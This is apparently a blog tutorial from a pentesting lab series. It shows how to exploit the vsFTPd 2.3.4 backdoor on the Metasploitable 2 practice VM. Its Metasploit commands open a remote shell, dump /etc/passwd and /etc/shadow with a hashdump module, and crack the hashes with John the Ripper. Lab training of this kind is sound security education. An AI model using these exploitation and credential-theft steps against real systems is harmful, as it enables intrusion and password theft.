Metasploitable 2: Port 21

Miguel Sampaio da Veiga
Hacker Toolbelt
Published in
3 min readApr 24, 2019

In the previous article Metasploit 2 I — Lab Setup I’ve explained how to install and prepare metasploitable 2 in a virtual environment for the purpose of pentesting.

I’ve ended the article after running a nmap and a metaploit syn scan module:

Port 21 scan

In the picture above we can see a list of open ports. Our job as pentesters is to determine how secure (or not) are the services running in those ports. We’ll start with port 21, ftp default port.

Within the metasploit framework we’ll run a nmap service scan targeting port 21:

> db_nmap -p 21 -A -sV -sC

MSF also has an auxiliary module for ftp:

> use auxiliary/scanner/ftp/ftp_version

> run

Remember: the RHOSTS variable was set globally in the previous article.

Lets view the results of our port scan:

We have a FTP Server, specifically vsFTP 2.3.4. running. Lets do a search in exploitDB through searchploit:

$ searchploit vsftp

As we can see, there is a backdoor command execution exploit for our version of vsftp. Lets go back to MSF, search for the exploit, load it, view its information and run it:

> grep vsftp search exploits

> use exploit/unix/ftp/vsftp_234_backdoor

>show info

> run

And now we have a shell in session 2. We can send it to background (^Z), list opened sessions (sessions -l) and interact (sessions 2)

We’ll try to extract users and passwords from the target using the hashdump module. Put the session in the background and select the module:

> use post/linux/gather/hashdump

> show options

> set SESSION 2

> show info

> run

Now use the ‘loot’ command to see the results so far:

> loot

We were able to obtain the passwd, shadow and unshadow files.

Open another terminal to get John the Ripper to crack them open:

$ john .msf4/loot/20190402110303_metasploitable2_192.168.231.109_linux.hashes_935091.txt

To view results use the --show option:


Continuing where we left off in part I, we scanned port 21 and determined that a vulnerable version was running the FTP service. Using MSF we were able to:

  • create a remote session,
  • get the /etc/passwd and /etc/shadow files
  • obtain access credentials using John the Ripper

We’ll keep probing Metasploitable 2 in the next articles.

